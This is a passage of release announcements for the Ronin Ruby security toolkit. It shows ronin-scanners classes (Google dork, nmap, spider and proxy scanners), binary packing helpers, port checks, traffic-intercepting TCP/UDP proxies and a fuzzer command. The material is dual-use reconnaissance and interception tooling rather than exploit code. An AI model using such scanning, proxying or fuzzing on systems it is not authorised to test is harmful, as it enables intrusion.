<span class="k">unless</span> <span class="n">result</span><span class="p">.</span><span class="nf">kind_of?</span><span class="p">(</span><span class="o">::</span><span class="no">URI</span><span class="o">::</span><span class="no">Generic</span><span class="p">)</span>
<span class="k">begin</span>
<span class="no">URI</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="n">result</span><span class="p">.</span><span class="nf">to_s</span><span class="p">)</span>
<span class="k">rescue</span> <span class="no">URI</span><span class="o">::</span><span class="no">InvalidURIError</span><span class="p">,</span> <span class="no">URI</span><span class="o">::</span><span class="no">InvalidComponentError</span>
<span class="k">end</span>
<span class="k">else</span>
<span class="n">result</span>
<span class="k">end</span>
<span class="k">end</span></code></pre></figure>
<p>If <code class="language-plaintext highlighter-rouge">normalize_result</code> returns <code class="language-plaintext highlighter-rouge">nil</code>, the result is considered invalid and
ignored.</p>
<h3 id="resources">Resources</h3>
<p>In order for a Scanner to import results into the Database, it must define
a <code class="language-plaintext highlighter-rouge">new_resource</code> method. The <code class="language-plaintext highlighter-rouge">new_resource</code> method takes a Scanner result and
converts it into a Database Resource, which can later be saved into
the Database.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="k">def</span> <span class="nf">new_resource</span><span class="p">(</span><span class="n">result</span><span class="p">)</span>
<span class="no">IPAddress</span><span class="p">.</span><span class="nf">first_or_new</span><span class="p">(</span><span class="ss">:address</span> <span class="o">=></span> <span class="n">result</span><span class="p">)</span>
<span class="k">end</span></code></pre></figure>
<p>Depending on which Scanner base-class one inherits from
(ex: <a href="/docs/ronin-scanners/Ronin/Scanners/URLScanner.html">URLScanner</a>), a <code class="language-plaintext highlighter-rouge">new_resource</code> method
may already be defined.</p>
<h3 id="methods">Methods</h3>
<p>The <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html">Scanner</a> base class defines three methods
for enumerating over Scanner results:</p>
<ol>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#each-instance_method">each</a> - The primary enumerator method, which simply calls <code class="language-plaintext highlighter-rouge">scan</code> and yields
the Scanner results.</li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#each_resource-instance_method">each_resource</a> - Simply calls <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#each-instance_method">each</a> and converts each Scanner result
into a Database Resource object via the <code class="language-plaintext highlighter-rouge">new_resource</code> method.</li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#import-instance_method">import</a> - Simply calls <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#each_resource-instance_method">each_resource</a>, saves each new Database
Resource returned by <code class="language-plaintext highlighter-rouge">new_resource</code> and yields the successfully saved
Resources.</li>
</ol>
<p>For convenience sake, <a href="/docs/ronin-scanners/Ronin/Scanners/URLScanner.html">Scanner</a> also define
class-methods for <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#each-class_method">each</a>,
<a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#scan-class_method">scan</a> and
<a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html#import-class_method">import</a>.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="no">Ronin</span><span class="o">::</span><span class="no">Scanners</span><span class="o">::</span><span class="no">Spider</span><span class="p">.</span><span class="nf">import</span><span class="p">(</span><span class="ss">:hosts</span> <span class="o">=></span> <span class="p">[</span><span class="s1">'www.example.com'</span><span class="p">])</span> <span class="k">do</span> <span class="o">|</span><span class="n">url</span><span class="o">|</span>
<span class="nb">puts</span> <span class="s2">"Scanned </span><span class="si">#{</span><span class="n">url</span><span class="si">}</span><span class="s2">"</span>
<span class="k">end</span></code></pre></figure>
<h2 id="classes">Classes</h2>
<p><a href="https://github.com/ronin-rb/ronin-scanners#readme">ronin-scanners</a> provides various Scanner base-classes:</p>
<ul>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/IPScanner.html">Ronin::Scanners::IPScanner</a></li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/HostNameScanner.html">Ronin::Scanners::HostNameScanner</a></li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/TCPPortScanner.html">Ronin::Scanners::TCPPortScanner</a></li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/UDPPortScanner.html">Ronin::Scanners::UDPPortScanner</a></li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/URLScanner.html">Ronin::Scanners::URLScanner</a></li>
</ul>
<p><a href="https://github.com/ronin-rb/ronin-scanners#readme">ronin-scanners</a> also provides several built-in Scanners:</p>
<ul>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/Dork.html">Ronin::Scanners::Dork</a></li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/ResolvScanner.html">Ronin::Scanners::ResolvScanner</a></li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/ReverseLookupScanner.html">Ronin::Scanners::ReverseLookupScanner</a></li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/SiteMap.html">Ronin::Scanners::SiteMap</a></li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/Spider.html">Ronin::Scanners::Spider</a></li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/Nmap.html">Ronin::Scanners::Nmap</a></li>
<li><a href="/docs/ronin-scanners/Ronin/Scanners/Proxies.html">Ronin::Scanners::Proxies</a></li>
</ul>
<h2 id="commands">Commands</h2>
<p><a href="https://github.com/ronin-rb/ronin-scanners#readme">ronin-scanners</a> provides several commands for the built-in Scanners:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">$ ronin scanners</code> - Starts the Ronin Console with ronin-scanners loaded.</li>
<li><code class="language-plaintext highlighter-rouge">$ ronin scanner</code> - Loads a Scanner from a file or from the Database
and runs it.</li>
<li><code class="language-plaintext highlighter-rouge">$ ronin scan:dork</code> - Performs Google Dorks.</li>
<li><code class="language-plaintext highlighter-rouge">$ ronin scan:nmap</code> - Automates nmap scans and imports them into the Database.</li>
<li><code class="language-plaintext highlighter-rouge">$ ronin scan:proxies</code> - Scans for proxies and imports them into the Database.</li>
<li><code class="language-plaintext highlighter-rouge">$ ronin scan:spider</code> - Spiders a website and saves URLs into the Database.</li>
</ul>
<h2 id="how-to-help">How to Help</h2>
<p>Since this is a pre-release <em>and</em> a complete rewrite of <a href="https://github.com/ronin-rb/ronin-scanners#readme">ronin-scanners</a>,
your help is greatly needed! Here’s how you can help out:</p>
<ol>
<li>Install it (<code class="language-plaintext highlighter-rouge">$ gem install ronin-scanners --pre</code>)</li>
<li>Test the commands</li>
<li>Review the <a href="/docs/ronin-scanners/frames">documentation</a></li>
<li>Attempt to write a <a href="https://gist.github.com/3803087">script</a>
which uses one of the Scanners</li>
<li>Submit bugs or suggestions on <a href="https://github.com/ronin-rb/ronin-scanners/issues?direction=desc&sort=created&state=open">GitHub</a></li>
</ol>
<p>Let’s make <a href="https://github.com/ronin-rb/ronin-scanners#readme">ronin-scanners</a> 1.0.0 a solid release!</p>
ronin-support 0.5.0, ronin 1.5.0 and ronin-gen 1.2.0 released!2012-06-16 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2012/06/16/ronin-1-5-0-released.html<p><a href="/docs/ronin-support/file.ChangeLog.html">ronin-support 0.5.0</a>, <a href="/docs/ronin/file.ChangeLog.html">ronin 1.5.0</a> and <a href="/docs/ronin-gen/file.ChangeLog.html">ronin-gen 1.2.0</a>
have finally been released!</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gem install ronin-support ronin ronin-gen
</code></pre></div></div>
<h2 id="checksums">Checksums</h2>
<ul>
<li><a href="https://rubygems.org/downloads/ronin-support-0.5.0.gem">ronin-support-0.5.0.gem</a>
<ul>
<li><strong>MD5:</strong> <code class="language-plaintext highlighter-rouge">98594570d14c37101abdfdba32c6505f</code></li>
<li><strong>SHA1:</strong> <code class="language-plaintext highlighter-rouge">9c505fa3bdb5d38831acfb10ea2989f214db517d</code></li>
<li><a href="https://github.com/downloads/ronin-rb/ronin-support/ronin-support-0.5.0.gem.asc">PGP</a></li>
</ul>
</li>
<li><a href="https://rubygems.org/downloads/ronin-1.5.0.gem">ronin-1.5.0.gem</a>
<ul>
<li><strong>MD5:</strong> <code class="language-plaintext highlighter-rouge">1bfa9fc2709cc98231abf6944780ab63</code></li>
<li><strong>SHA1:</strong> <code class="language-plaintext highlighter-rouge">320659d87280d0a99075481ae7a05aa8bad4fff9</code></li>
<li><a href="https://github.com/downloads/ronin-rb/ronin/ronin-1.5.0.gem.asc">PGP</a></li>
</ul>
</li>
<li><a href="https://rubygems.org/downloads/ronin-gen-1.2.0.gem">ronin-gen-1.2.0.gem</a>
<ul>
<li><strong>MD5:</strong> <code class="language-plaintext highlighter-rouge">d3a3ea9c59f73abb274be8705160f1a2</code></li>
<li><strong>SHA1:</strong> <code class="language-plaintext highlighter-rouge">f4a186f9772c2b8bf6807192a0740f3148c81e71</code></li>
<li><a href="https://github.com/downloads/ronin-rb/ronin-gen/ronin-gen-1.2.0.gem.asc">PGP</a></li>
</ul>
</li>
</ul>
<h2 id="whats-new">Whats New?</h2>
<h3 id="pack--unpack">pack / unpack</h3>
<p>Special <code class="language-plaintext highlighter-rouge">pack</code> / <code class="language-plaintext highlighter-rouge">unpack</code> methods were added to <a href="/docs/ronin-support/String.html#unpack-instance_method">String</a>,
<a href="/docs/ronin-support/Integer.html#pack-instance_method">Integer</a>, <a href="/docs/ronin-support/Float.html#pack-instance_method">Float</a> and <a href="/docs/ronin-support/Array.html#pack-instance_method">Array</a>
classes. Unlike the normal <a href="http://rubydoc.info/stdlib/core/Array#pack-instance_method">Array#pack</a> / <a href="http://rubydoc.info/stdlib/core/String#unpack-instance_method">String#unpack</a> methods,
these methods accept C-types:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="p">[</span><span class="mh">0x5</span><span class="p">,</span> <span class="s2">"hello"</span><span class="p">].</span><span class="nf">pack</span><span class="p">(</span><span class="ss">:uint16_be</span><span class="p">,</span> <span class="ss">:string</span><span class="p">)</span>
<span class="c1"># => "\x00\x05hello\x00"</span></code></pre></figure>
<p>You can even specify the lengths of fields with <a href="/docs/ronin-support/Array.html#pack-instance_method">Array#pack</a> and
<a href="/docs/ronin-support/String.html#unpack-instance_method">String#unpack</a>:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="p">[</span><span class="mh">0x1</span><span class="p">,</span> <span class="mh">0x2</span><span class="p">,</span> <span class="mh">0x3</span><span class="p">,</span> <span class="mh">0x4</span><span class="p">,</span> <span class="s2">"hello"</span><span class="p">].</span><span class="nf">pack</span><span class="p">([</span><span class="ss">:uint8</span><span class="p">,</span> <span class="mi">4</span><span class="p">],</span> <span class="ss">:string</span><span class="p">)</span>
<span class="c1"># => "\x01\x02\x03\x04hello\x00"</span></code></pre></figure>
<p>For a complete list of supported types, please see the documentation for
<a href="/docs/ronin-support/Ronin/Binary/Template.html">Binary::Template</a>.</p>
<h3 id="binarytemplate">Binary::Template</h3>
<p>The way we implemented the fancy <code class="language-plaintext highlighter-rouge">pack</code> / <code class="language-plaintext highlighter-rouge">unpack</code> methods, was to create a
template (<a href="/docs/ronin-support/Ronin/Binary/Template.html">Binary::Template</a>) which translates C-types to Ruby <a href="http://rubydoc.info/stdlib/core/Array#pack-instance_method">pack codes</a>.
Using <a href="/docs/ronin-support/Ronin/Binary/Template.html">Binary::Template</a> you can create reusable binary templates for packing
and unpacking data.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">template</span> <span class="o">=</span> <span class="no">Binary</span><span class="o">::</span><span class="no">Template</span><span class="p">[</span><span class="ss">:uint16_be</span><span class="p">,</span> <span class="ss">:string</span><span class="p">]</span>
<span class="n">template</span><span class="p">.</span><span class="nf">pack</span><span class="p">(</span><span class="mh">0x5</span><span class="p">,</span> <span class="s2">"hello"</span><span class="p">)</span>
<span class="c1"># => "\x00\x05hello\x00"</span>
<span class="n">template</span><span class="p">.</span><span class="nf">unpack</span><span class="p">(</span><span class="s2">"</span><span class="se">\x00\x05</span><span class="s2">hello</span><span class="se">\x00</span><span class="s2">"</span><span class="p">)</span>
<span class="c1"># => [5, "hello"]</span></code></pre></figure>
<h3 id="binarystruct">Binary::Struct</h3>
<p><a href="/docs/ronin-support/Ronin/Binary/Struct.html">Binary::Struct</a> was also added to ronin-support 0.5.0. It is similar to
<a href="http://metafuzz.rubyforge.org/binstruct/">BinStruct</a>, but provides the same API as <a href="https://github.com/ffi/ffi/wiki/Structs">FFI::Struct</a>. It supports
typedefs, Array fields, nested-Structs and overriding reader/writer methods
of fields.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="nb">require</span> <span class="s1">'ronin/binary/struct'</span>
<span class="k">class</span> <span class="nc">Packet</span> <span class="o"><</span> <span class="no">Binary</span><span class="o">::</span><span class="no">Struct</span>
<span class="n">endian</span> <span class="ss">:network</span>
<span class="n">layout</span> <span class="ss">:length</span><span class="p">,</span> <span class="ss">:uint32</span><span class="p">,</span>
<span class="ss">:data</span><span class="p">,</span> <span class="p">[</span><span class="ss">:uchar</span><span class="p">,</span> <span class="mi">48</span><span class="p">]</span>
<span class="k">end</span>
<span class="n">pkt</span> <span class="o">=</span> <span class="no">Packet</span><span class="p">.</span><span class="nf">new</span>
<span class="n">pkt</span><span class="p">.</span><span class="nf">length</span> <span class="o">=</span> <span class="mi">5</span>
<span class="n">pkt</span><span class="p">.</span><span class="nf">data</span> <span class="o">=</span> <span class="s1">'hello'</span>
<span class="n">buffer</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="nf">pack</span>
<span class="c1"># => "\x00\x00\x00\x05hello\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"</span>
<span class="n">new_pkt</span> <span class="o">=</span> <span class="no">Packet</span><span class="p">.</span><span class="nf">unpack</span><span class="p">(</span><span class="n">buffer</span><span class="p">)</span>
<span class="c1"># => #<Packet: length: 5, data: "hello"></span></code></pre></figure>
<h3 id="tcp_open--udp_open">tcp_open? / udp_open?</h3>
<p>The <a href="/docs/ronin-support/Ronin/Network/TCP.html#tcp_open%3F-instance_method">tcp_open?</a> and <a href="/docs/ronin-support/Ronin/Network/UDP.html#udp_open%3F-instance_method">udp_open?</a>
methods were added to ronin-support 0.5.0. These methods perform basic tests
to determine if a TCP / UDP port is open.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">tcp_open?</span><span class="p">(</span><span class="s1">'example.com'</span><span class="p">,</span><span class="mi">80</span><span class="p">)</span>
<span class="c1"># => true</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">udp_open?</span><span class="p">(</span><span class="s1">'4.2.2.1'</span><span class="p">,</span><span class="mi">53</span><span class="p">)</span>
<span class="c1"># => true</span></code></pre></figure>
<h3 id="networkunix">Network::UNIX</h3>
<p><a href="/docs/ronin-support/Ronin/Network/UNIX.html">Network::UNIX</a> was added to help communicating with UNIX sockets.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">unix_connect</span><span class="p">(</span><span class="s1">'/tmp/haproxy.stats.socket'</span><span class="p">)</span>
<span class="c1"># => #<UNIXSocket:...></span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">unix_session</span><span class="p">(</span><span class="s1">'/tmp/haproxy.stats.socket'</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">socket</span><span class="o">|</span>
<span class="n">socket</span><span class="p">.</span><span class="nf">puts</span><span class="p">(</span><span class="s2">"show stat"</span><span class="p">)</span>
<span class="nb">puts</span> <span class="n">socket</span><span class="p">.</span><span class="nf">readlines</span>
<span class="k">end</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">unix_accept</span><span class="p">(</span><span class="s1">'/tmp/race_condition.socket'</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">socket</span><span class="o">|</span>
<span class="n">sockets</span><span class="p">.</span><span class="nf">puts</span><span class="p">(</span><span class="n">buffer</span><span class="p">)</span>
<span class="k">end</span></code></pre></figure>
<h3 id="networkftp">Network::FTP</h3>
<p><a href="/docs/ronin-support/Ronin/Network/FTP.html">Network::FTP</a> was added to provide the same helper methods as <a href="/docs/ronin-support/Ronin/Network/IMAP.html">Network::IMAP</a>,
but for communicating with FTP Servers.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">ftp_connect</span><span class="p">(</span><span class="s1">'www.example.com'</span><span class="p">,</span> <span class="ss">:user</span> <span class="o">=></span> <span class="s1">'joe'</span><span class="p">,</span> <span class="ss">:password</span> <span class="o">=></span> <span class="s1">'secret'</span><span class="p">)</span>
<span class="c1"># => #<Net::FTP:...></span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">ftp_session</span><span class="p">(</span><span class="s1">'ftp.kernel.org'</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">ftp</span><span class="o">|</span>
<span class="n">ftp</span><span class="p">.</span><span class="nf">chdir</span><span class="p">(</span><span class="s1">'/pub'</span><span class="p">)</span>
<span class="nb">puts</span> <span class="n">ftp</span><span class="p">.</span><span class="nf">list</span>
<span class="k">end</span></code></pre></figure>
<h3 id="networktcpproxy--networkudpproxy">Network::TCP::Proxy / Network::UDP::Proxy</h3>
<p><a href="/docs/ronin-support/Ronin/Network/TCP/Proxy.html">Network::TCP::Proxy</a> and <a href="/docs/ronin-support/Ronin/Network/UDP/Proxy.html">Network::UDP::Proxy</a> were added as well. Finally,
you can create simple evented TCP/UDP proxies, to intercept or rewrite
messages.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="nb">require</span> <span class="s1">'ronin/network/tcp/proxy'</span>
<span class="nb">require</span> <span class="s1">'hexdump'</span>
<span class="no">Ronin</span><span class="o">::</span><span class="no">Network</span><span class="o">::</span><span class="no">TCP</span><span class="o">::</span><span class="no">Proxy</span><span class="p">.</span><span class="nf">start</span><span class="p">(</span><span class="ss">:port</span> <span class="o">=></span> <span class="mi">1337</span><span class="p">,</span> <span class="ss">:server</span> <span class="o">=></span> <span class="p">[</span><span class="s1">'www.wired.com'</span><span class="p">,</span> <span class="mi">80</span><span class="p">])</span> <span class="k">do</span> <span class="o">|</span><span class="n">proxy</span><span class="o">|</span>
<span class="n">address</span> <span class="o">=</span> <span class="nb">lambda</span> <span class="p">{</span> <span class="o">|</span><span class="n">socket</span><span class="o">|</span>
<span class="n">addrinfo</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="nf">peeraddr</span>
<span class="s2">"</span><span class="si">#{</span><span class="n">addrinfo</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span><span class="si">}</span><span class="s2">:</span><span class="si">#{</span><span class="n">addrinfo</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="si">}</span><span class="s2">"</span>
<span class="p">}</span>
<span class="n">hex</span> <span class="o">=</span> <span class="no">Hexdump</span><span class="o">::</span><span class="no">Dumper</span><span class="p">.</span><span class="nf">new</span>
<span class="n">proxy</span><span class="p">.</span><span class="nf">on_client_data</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="p">,</span><span class="n">server</span><span class="p">,</span><span class="n">data</span><span class="o">|</span>
<span class="nb">puts</span> <span class="s2">"</span><span class="si">#{</span><span class="n">address</span><span class="p">[</span><span class="n">client</span><span class="p">]</span><span class="si">}</span><span class="s2"> -> </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2">"</span>
<span class="n">hex</span><span class="p">.</span><span class="nf">dump</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">end</span>
<span class="n">proxy</span><span class="p">.</span><span class="nf">on_client_connect</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="o">|</span>
<span class="nb">puts</span> <span class="s2">"</span><span class="si">#{</span><span class="n">address</span><span class="p">[</span><span class="n">client</span><span class="p">]</span><span class="si">}</span><span class="s2"> -> </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2"> [connected]"</span>
<span class="k">end</span>
<span class="n">proxy</span><span class="p">.</span><span class="nf">on_client_disconnect</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="p">,</span><span class="n">server</span><span class="o">|</span>
<span class="nb">puts</span> <span class="s2">"</span><span class="si">#{</span><span class="n">address</span><span class="p">[</span><span class="n">client</span><span class="p">]</span><span class="si">}</span><span class="s2"> <- </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2"> [disconnected]"</span>
<span class="k">end</span>
<span class="n">proxy</span><span class="p">.</span><span class="nf">on_server_data</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="p">,</span><span class="n">server</span><span class="p">,</span><span class="n">data</span><span class="o">|</span>
<span class="nb">puts</span> <span class="s2">"</span><span class="si">#{</span><span class="n">address</span><span class="p">[</span><span class="n">client</span><span class="p">]</span><span class="si">}</span><span class="s2"> <- </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2">"</span>
<span class="n">hex</span><span class="p">.</span><span class="nf">dump</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">end</span>
<span class="n">proxy</span><span class="p">.</span><span class="nf">on_server_connect</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="p">,</span><span class="n">server</span><span class="o">|</span>
<span class="nb">puts</span> <span class="s2">"</span><span class="si">#{</span><span class="n">address</span><span class="p">[</span><span class="n">client</span><span class="p">]</span><span class="si">}</span><span class="s2"> <- </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2"> [connected]"</span>
<span class="k">end</span>
<span class="n">proxy</span><span class="p">.</span><span class="nf">on_server_disconnect</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="p">,</span><span class="n">server</span><span class="o">|</span>
<span class="nb">puts</span> <span class="s2">"</span><span class="si">#{</span><span class="n">address</span><span class="p">[</span><span class="n">client</span><span class="p">]</span><span class="si">}</span><span class="s2"> <- </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2"> [disconnected]"</span>
<span class="k">end</span>
<span class="k">end</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="nb">require</span> <span class="s1">'ronin/network/udp/proxy'</span>
<span class="nb">require</span> <span class="s1">'hexdump'</span>
<span class="no">Ronin</span><span class="o">::</span><span class="no">Network</span><span class="o">::</span><span class="no">UDP</span><span class="o">::</span><span class="no">Proxy</span><span class="p">.</span><span class="nf">start</span><span class="p">(</span><span class="ss">:port</span> <span class="o">=></span> <span class="mi">1337</span><span class="p">,</span> <span class="ss">:server</span> <span class="o">=></span> <span class="p">[</span><span class="s1">'4.2.2.1'</span><span class="p">,</span> <span class="mi">53</span><span class="p">])</span> <span class="k">do</span> <span class="o">|</span><span class="n">proxy</span><span class="o">|</span>
<span class="n">hex</span> <span class="o">=</span> <span class="no">Hexdump</span><span class="o">::</span><span class="no">Dumper</span><span class="p">.</span><span class="nf">new</span>
<span class="n">proxy</span><span class="p">.</span><span class="nf">on_client_data</span> <span class="k">do</span> <span class="o">|</span><span class="p">(</span><span class="n">client</span><span class="p">,(</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">)),</span><span class="n">server</span><span class="p">,</span><span class="n">data</span><span class="o">|</span>
<span class="nb">puts</span> <span class="s2">"</span><span class="si">#{</span><span class="n">host</span><span class="si">}</span><span class="s2">:</span><span class="si">#{</span><span class="n">port</span><span class="si">}</span><span class="s2"> -> </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2">"</span>
<span class="n">hex</span><span class="p">.</span><span class="nf">dump</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">end</span>
<span class="n">proxy</span><span class="p">.</span><span class="nf">on_server_data</span> <span class="k">do</span> <span class="o">|</span><span class="p">(</span><span class="n">client</span><span class="p">,(</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">)),</span><span class="n">server</span><span class="p">,</span><span class="n">data</span><span class="o">|</span>
<span class="nb">puts</span> <span class="s2">"</span><span class="si">#{</span><span class="n">host</span><span class="si">}</span><span class="s2">:</span><span class="si">#{</span><span class="n">port</span><span class="si">}</span><span class="s2"> <- </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2">"</span>
<span class="n">hex</span><span class="p">.</span><span class="nf">dump</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">end</span>
<span class="k">end</span></code></pre></figure>
<h3 id="console-commands">Console Commands</h3>
<p>In ronin 1.5.0, one can now embed variables into shell commands:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> !ncat #{ip} #{port}
</code></pre></div></div>
<p>Special Console commands (<code class="language-plaintext highlighter-rouge">edit</code>) have been separated from shell
commands (<code class="language-plaintext highlighter-rouge">!netstat -an</code>) and are now prefixed with a <code class="language-plaintext highlighter-rouge">.</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>> .edit
</code></pre></div></div>
<h3 id="ronin-netproxy">ronin net:proxy</h3>
<p>Building on <a href="/docs/ronin-support/Ronin/Network/TCP/Proxy.html">Network::TCP::Proxy</a> and <a href="/docs/ronin-support/Ronin/Network/UDP/Proxy.html">Network::UDP::Proxy</a>, the <a href="/docs/ronin/Ronin/UI/CLI/Commands/Net/Proxy.html">net:proxy</a>
command was added to ronin 1.5.0 for quick proxying.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ronin net:proxy --port 8080 --server google.com:80
$ ronin net:proxy --port 53 --server 4.2.2.1 --udp --hexdump
</code></pre></div></div>
<h3 id="ronin-fuzzer">ronin fuzzer</h3>
<p>The <a href="/docs/ronin/Ronin/UI/CLI/Commands/Fuzzer.html">fuzzer</a> command was also added to ronin 1.5.0, for quick and dirty fuzzing
of files, commands, TCP/UDP Services.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ronin fuzzer -i request.txt -o bad.txt -r unix_path:bad_strings
</code></pre></div></div>
<h3 id="man-pages">Man pages</h3>
<p>Ronin 1.5.0 now sports professional man-pages for every command. The man-pages
are viewed using the <code class="language-plaintext highlighter-rouge">ronin help</code> command.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ronin-help wordlist
</code></pre></div></div>
<h2 id="update">Update</h2>
<p>Due to a few minor bugs that slipped past QA, <a href="/docs/ronin-support/file.ChangeLog.html">ronin-support 0.5.1</a> has been
released:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gem update ronin-support
</code></pre></div></div>
<ul>
<li><a href="http://rubygems.org/downloads/ronin-support-0.5.1.gem">ronin-support-0.5.1.gem</a>:
<ul>
<li><strong>MD5</strong>: <code class="language-plaintext highlighter-rouge">4e7a07c174d27f8f2c33f43002357ab3</code></li>
<li><strong>SHA1</strong>: <code class="language-plaintext highlighter-rouge">1a5f5580b0e7b76e5271e60db30d17bc6702b61a</code></li>
<li><a href="https://github.com/downloads/ronin-rb/ronin-support/ronin-support-0.5.1.gem.asc">PGP</a></li>
</ul>
</li>
</ul>
ronin-support 0.5.0.rc2, ronin 1.5.0.rc2, ronin-gen 1.2.0.rc2 released2012-06-07 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2012/06/07/ronin-1-5-0-rc2-released.html<p><a href="http://rubygems.org/gems/ronin-support/versions/0.5.0.rc2">ronin-support 0.5.0.rc2</a>, <a href="http://rubygems.org/gems/ronin/versions/1.5.0.rc2">ronin 1.5.0.rc2</a> and <a href="http://rubygems.org/gems/ronin-gen/versions/1.2.0.rc2">ronin-gen 1.2.0.rc2</a>
have been released.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gem install ronin-support ronin ronin-gen --pre
</code></pre></div></div>
<h3 id="checksums">Checksums</h3>
<ul>
<li><code class="language-plaintext highlighter-rouge">ronin-support-0.5.0.rc2.gem</code>
<ul>
<li><strong>MD5:</strong> <code class="language-plaintext highlighter-rouge">f6e8039f25723612ffc634d1c6ca0854</code></li>
<li><strong>SHA1:</strong> <code class="language-plaintext highlighter-rouge">14df56b762b4a8a2439551e638b76c9a6375adde</code></li>
<li><a href="https://github.com/downloads/ronin-rb/ronin-support/ronin-support-0.5.0.rc2.gem.asc">PGP</a></li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">ronin-1.5.0.rc2.gem</code>
<ul>
<li><strong>MD5:</strong> <code class="language-plaintext highlighter-rouge">95746681d6cdbfd385bed63b43166b5f</code></li>
<li><strong>SHA1:</strong> <code class="language-plaintext highlighter-rouge">edc5e60fa415843f882802c8ef059ee37a8dd49e</code></li>
<li><a href="https://github.com/downloads/ronin-rb/ronin/ronin-1.5.0.rc2.gem.asc">PGP</a></li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">ronin-gen-1.2.0.rc2.gem</code>
<ul>
<li><strong>MD5:</strong> <code class="language-plaintext highlighter-rouge">8bd309dccb32e585f0c2e585bb7ab29d</code></li>
<li><strong>SHA1:</strong> <code class="language-plaintext highlighter-rouge">ecc6efba1c674de73ea649b1051d76077c91ea44</code></li>
